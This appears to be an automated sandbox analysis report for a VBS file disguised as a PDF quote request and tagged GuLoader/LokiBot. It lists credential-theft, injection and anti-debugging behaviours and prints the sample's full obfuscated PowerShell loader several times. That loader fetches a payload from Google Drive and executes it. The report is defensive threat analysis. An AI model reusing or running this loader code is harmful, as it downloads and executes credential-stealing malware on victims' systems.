Malware Analysis Report

2024-11-30 23:46

Sample ID 240917-rc9llawgnc
Target Zahteva za proračun 09-17-2024·pdf.vbs
SHA256 ea326ab009621bee402f7e6a54423851ed9f357ff7c773b790f32be91098c2b9
Tags
guloader lokibot collection credential_access discovery downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ea326ab009621bee402f7e6a54423851ed9f357ff7c773b790f32be91098c2b9

Threat Level: Known bad

The file Zahteva za proračun 09-17-2024·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

outlook_win_path

outlook_office_path

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 14:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 14:04

Reported

2024-09-17 14:06

Platform

win7-20240903-en

Max time kernel

145s

Max time network

155s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zahteva za proračun 09-17-2024·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2568 set thread context of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 2176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 2176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 2132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zahteva za proračun 09-17-2024·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. ');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rougemontite.Syn && echo t"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. ');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front 